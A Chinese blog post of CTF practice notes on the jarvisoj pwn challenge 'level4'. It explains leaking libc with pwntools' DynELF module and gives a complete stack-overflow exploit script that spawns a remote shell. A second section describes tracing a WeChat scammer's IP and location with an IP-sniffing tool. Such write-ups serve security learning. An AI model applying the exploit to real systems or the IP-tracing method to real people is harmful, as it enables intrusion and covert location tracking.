pwn 练习笔记 暑假第八天 DynELF模块

最新推荐文章于 2023-09-16 23:52:06 发布
最新推荐文章于 2023-09-16 23:52:06 发布
阅读量1.9k 收藏 6
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38783875/article/details/81134840
版权
本文介绍如何使用DynELF模块绕过NX保护,实现远程代码执行。通过构造特定payload,利用read和system函数,成功将'/bin/sh'保存至.bss段并执行。此外,还分享了一次社工经历,展示了如何定位微信诈骗者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

继续昨天的未解之谜,leve4

在第二次感受火狐崩溃带来的绝望之后,在此立誓,再也不用火狐写博客

IDA打开查看一下伪代码:

图没截全,罢啦罢啦!那vul函数就看汇编吧

可看出,我们输入的字符串与ebp距离为0x88

checksec查看,开了nx保护

ROPgadget查看,没有‘/bin/sh’

DynELF是pwntools中专门用来应对无libc情况的漏洞利用模块

详细教程:https://blog.youkuaiyun.com/u011987514/article/details/68490157

然后查看,有system(好像开了ASLR所以会变)在没有libc.so的时候,我们用DynELF模块来确定system的地址

构造leak函数:

def leak(address):
    payload1 = "A" * 140 + p32(write_plt) + p32(main) + p32(1) + p32(address) + p32(4)
    p.sendline(payload1)
    data = p.recv(4)
    log.info("%#x => %s" % (address, (data or '').encode('hex')))
    return data

这段函数能从内存中addressdump4字节数据,函数执行结束后会返回main函数重新执行,也就是说利用这个函数,我们可以dump出整个libc

使用DynELF模块查找system函数地址:

d = DynELF(leak,elf=ELF('./level4'))
sys_addr = d.lookup('system','libc')

 

有了获取libc的方法之后,就只要将‘/bin/sh’能保存到.bss断中,就可以执行system('/bin/sh')
首先我们要有bss的地址用来将输入的'/bin/sh'保存   利用bss_addr = elf.bss()得到bss地址

构造payload1 = 填充字符+read函数+read函数的返回地址(main)+第一个参数(0)+第二个参数bss_addr+第三个参数(8)

这个payload可以将'/bin/sh'读取,保存到bss段

然后构造第三个payload = 填充字符+system函数地址+'bbbb'+binsh(bss_addr)

脚本如下:

from pwn import *

sh = remote("pwn2.jarvisoj.com",9880)
e = ELF('./level4')

bss_addr = e.bss()
write_plt = e.symbols['write']
read_plt = e.symbols['read']
vul_addr = e.symbols['vulnerable_function']

print '[+]--------------get address-------------'
def leak(address):
    payload = 'a'*140 +p32(write_plt)+p32(vul_addr)+p32(1)+p32(address)+p32(4)
    sh.send(payload)
    leak_addr = sh.recv(4)
    return leak_addr
d = DynELF(leak,elf=e)
sys_addr = d.lookup('system','libc')
print 'success'+hex(sys_addr)


print '[+]-----------send payload1------------------'
payload1 = 'a'*140 +p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
sh.send(payload1)
sh.send('/bin/sh\x00')
print '[+]-----------send payload2------------------'
payload2 = 'a'*140 +p32(sys_addr)+'bbbb'+p32(bss_addr)
sh.send(payload2)
sh.interactive()

-------------------------------------------------------------------------------------------------------------------------------------------------------------

今天在外力作用下,搞了一波社工,所以耽误了真正的学习计划,还是记录一下

实现了第一次顺着网线吊打微信诈骗,其实知道的信息还挺多,知道了对方的座机号,银行卡号,微信号

然后从微信入手,在夜神模拟器里面装了微信,然后下载了IP雷达

开启IP雷达之后,给对方拨打语音电话,就可以看出对方IP,再通过IP定位网站,定位到骗子的所在地。

下面是关于微信定位的几个教程,还有定位网站:

https://www.52pojie.cn/thread-634989-1-1.html

https://www.52pojie.cn/thread-626021-1-1.html

https://www.52pojie.cn/thread-638554-1-1.html

突然觉得社工还是要学的,不然被骗了还手的能力都没有,这个假期的学习目标又多了一样

pwntools中DynELF使用
weixin_41038905的博客
04-19 956
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
DynELF模块和通用gadget实现libc通杀(详细注释)
weixin_48066554的博客
06-22 840
DynELF模块和通用gadget实现libc通杀(详细注释) 文章目录用DynELF模块和通用gadget实现libc通杀(详细注释)泄露libc版本方式x86版本x64版本万能gadgetret2libcx86版本x64版本 泄露libc版本方式 主要原理:利用栈溢出等写入栈的手段调用write或者puts函数,并控制write或puts函数参数泄露libc函数真实地址 write函数特点:可以控制大小,但是在64位程序中需要使用gadget进行寄存器传参,有时可能碰不到合适gadget puts函
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 591
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
pwn libc之Dynelf工具
清霂的博客
04-02 592
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 1012
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
pwn 练习笔记 暑假的第二天 got表覆盖
SsMing的博客
07-14 2594
pwnable passcode1.ssh连上去看源码:#include <stdio.h>#include <stdlib.h>void login(){    int passcode1;    int passcode2;    printf("enter passcode1 : ");    scanf("%d", passcode1);    fflush(std...
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
做jarvisoj pwn level4时LibcSearcher和DynELF搜到的libc版本不同
weixin_43350880的博客
08-07 858
jarvisoj pwn的level4乍一看是一道常规的ROP,可以ret2libc 但是遇到一个问题 自己写的脚本本地能跑通,远程跑不通 可以看到本地是能拿到shell的 在网上搜了其他人的wp,全都是用DynELF做的,对比发现是LibcSearcher和DynELF搜到的libc版本不同导致远程跑不通。 远程用DynELF找到的libc版本 远程LibcSearcher的结果 本地Dyn...
[PWN] jarvisoj_level4 DynELF()函数使用总结
最新发布
LDX的博客
09-16 221
DynELF使用技巧和示例
64位下pwntools中dynELF函数的使用
weixin_30362233的博客
12-07 409
这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法 编译好的程序http://pan.baidu.com/s/1jImF95O 源码在后面 from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + ...
DynELF
钞sir的博客
01-29 6387
我用三生的期许 换回三世相思雨 三千浮沉里的你 迷失轮回的自己
DynELFpwn200
weixin_44464829的博客
11-15 245
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
ROP实例分析(二)---------------------------DynELF使用
iDevil7的博客
07-13 748
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,其基本代码框架如下。需要使用者进行的工作主要集中在leak函数的具体实现上,上面的代码只是个模板。其中,address就是leak函数要泄漏信息的起始地址,而payload就是触发目标程序泄漏address处信息的攻击代码。A.使用条件不管有没有libc文件,要想获得目标系统的system函数地址,首先都要求目标二进制程序...
android elf解析Elf_Dyn标识符号
一只狍子的博客
07-25 832
DT_NULL Marks end of dynamic section DT_NEEDED String table offset to name of a needed library DT_PLTRELSZ Size in bytes of PLT relocs DT_PLTGOT Address of PLT and/or GOT DT_HASH Address o
pwn栈溢出之dltest(DynELF和libcSearcher利用)
weixin_44113469的博客
02-15 1302
栈溢出dltest解题步骤 思路分析:观察源码,是个栈溢出。没有system函数,也没有给libc库,但有read函数和write函数。可以借助DynELF泄露函数地址,定为system地址,然后借助read函数写入“/bin/sh”,并调用执行system(“/bin/sh”) 0x01 ...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwntools库DynELF函数使用小结
PLpa的博客
09-01 1800
DynELF函数 0x00.前言 当我们在使用ROP做题目的时候,发现题目并没有给出libc.so文件(或者libc.so直接给错),这就让一部分人犯了难,这个问题怎么解决嘞?这里,我们介绍一种不需要给出libc.so实体文件,我们直接从库里匹配libc.so的方法——pwntools中的DynELF函数。 0x01.使用条件 既然我们要使用这个函数,我们就必须知道这个函数使用起来要什么条件。 要...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值